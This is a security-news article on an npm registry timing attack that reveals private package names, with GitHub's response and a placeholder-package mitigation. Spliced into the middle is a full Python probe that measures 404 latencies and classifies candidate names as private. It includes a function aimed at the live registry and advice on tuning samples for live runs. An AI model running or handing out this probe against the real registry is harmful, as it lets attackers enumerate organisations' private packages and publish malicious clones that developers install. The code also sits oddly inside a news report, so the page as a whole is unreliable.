Security News > 2022 > October > New npm timing attack could lead to supply chain attacks

Security researchers have discovered a timing attack against the npm registry that reveals the names of private packages, so that threat actors can publish malicious clones publicly and trick developers into installing them instead. The attack relies on a small difference in how long the registry takes to return a "404 Not Found" error for a private package compared with a package that does not exist at all.
Although the response-time difference is only a few hundred milliseconds, it is enough to determine whether a given private package exists, which is all an attacker needs to set up a package impersonation attack.
npm exposes a registry API that lets users download existing packages, check whether a package exists, and retrieve information about all packages under a specific scope.
Aqua Security discovered the timing attack by using this API to query private packages they had created on npm themselves and comparing the response time of the resulting 404 errors with the response time of queries for packages that do not exist.
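The measurement described above, as an added example rather than Aqua Security's tool or code from the article: time repeated GET requests for a candidate name, take the median to suppress network jitter, and compare it against a baseline built from random names that certainly do not exist under the same scope. The probe function is injected so the same logic can run offline against a simulated registry; the scope, package names and latencies used in the demo are constructed, and the threshold of 200 ms is an assumption based on the "few hundred milliseconds" the article reports.

```python
"""npm 404 timing probe: added example, not Aqua Security's research tooling."""
import random
import statistics
import string
import time
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Set

REGISTRY = "https://registry.npmjs.org/"  # real registry; only used by http_probe when run live


def http_probe(name: str) -> float:
    """Time one GET of a package document and return elapsed seconds.

    The HTTP status is ignored on purpose: private and non-existent packages both
    answer 404, and the elapsed time is the only signal this probe cares about.
    """
    url = REGISTRY + name.replace("/", "%2f")
    start = time.perf_counter()
    try:
        urllib.request.urlopen(url, timeout=10).close()
    except urllib.error.HTTPError:
        pass
    return time.perf_counter() - start


def random_name(rng: random.Random, scope: str) -> str:
    """A scoped name that is vanishingly unlikely to exist (baseline material)."""
    tail = "".join(rng.choice(string.ascii_lowercase) for _ in range(24))
    return f"{scope}/{tail}"


def median_latency(name: str, probe: Callable[[str], float], samples: int) -> float:
    """Median of repeated probes; the median resists one-off slow responses."""
    return statistics.median(probe(name) for _ in range(samples))


def build_baseline(probe: Callable[[str], float], rng: random.Random, scope: str,
                   samples: int = 10, names: int = 5) -> float:
    """Typical 404 latency for names that cannot exist under the scope."""
    return statistics.median(
        median_latency(random_name(rng, scope), probe, samples) for _ in range(names)
    )


def classify(candidates: List[str], probe: Callable[[str], float], rng: random.Random,
             scope: str, samples: int = 10, threshold_s: float = 0.2) -> Dict[str, bool]:
    """True for each candidate whose 404 is slower than the baseline by more than threshold_s."""
    baseline = build_baseline(probe, rng, scope, samples)
    return {c: (median_latency(c, probe, samples) - baseline) > threshold_s for c in candidates}


def simulated_probe(private_names: Set[str], rng: random.Random,
                    exists_ms: float = 600.0, missing_ms: float = 100.0,
                    jitter_ms: float = 80.0) -> Callable[[str], float]:
    """Offline stand-in for the registry: slower 404 for 'private' names, plus noise.

    The latency figures are constructed for the demo, not measured values.
    """
    def probe(name: str) -> float:
        base = exists_ms if name in private_names else missing_ms
        return (base + rng.uniform(-jitter_ms, jitter_ms)) / 1000.0
    return probe


def demo() -> Dict[str, bool]:
    """Deterministic offline run against a constructed scope and package set."""
    rng = random.Random(1)
    private = {"@acme/billing-core", "@acme/auth-sdk"}  # constructed names
    probe = simulated_probe(private, rng)
    candidates = ["@acme/billing-core", "@acme/auth-sdk", "@acme/nothing-here"]
    return classify(candidates, probe, rng, "@acme")


if __name__ == "__main__":
    for name, looks_private in demo().items():
        print(f"{name}: {'likely private' if looks_private else 'does not exist'}")
```

To run the same logic against the live registry, pass `http_probe` to `classify` instead of the simulated probe; expect more jitter than the simulation and raise `samples` accordingly, since a single slow CDN response would otherwise shift a median.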
"Because of these architectural limitations, we cannot prevent timing attacks from determining whether a specific private package exists on npm," GitHub told Aqua Security.
As a mitigation, organizations can publish public placeholder packages under the same names as their private packages: npm does not allow a second package with the same name in the public registry, so an attacker who learns a private package's name cannot then register it.
Related news
- North Korea targets crypto developers via NPM supply chain attack
- Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers
- China-Linked Silk Typhoon Expands Cyber Attacks to IT Supply Chains for Initial Access
- GitHub supply chain attack spills secrets from 23,000 projects
- Supply chain attack on popular GitHub Action exposes CI/CD secrets
- Google acquisition target Wiz links fresh supply chain attack to 23K pwned GitHub repos
- GitHub Action hack likely led to another in cascading supply chain attack
- GitHub Action supply chain attack exposed secrets in 218 repos
- Coinbase Initially Targeted in GitHub Actions Supply Chain Attack; 218 Repositories' CI/CD Secrets Exposed
- THN Weekly Recap: GitHub Supply Chain Attack, AI Malware, BYOVD Tactics, and More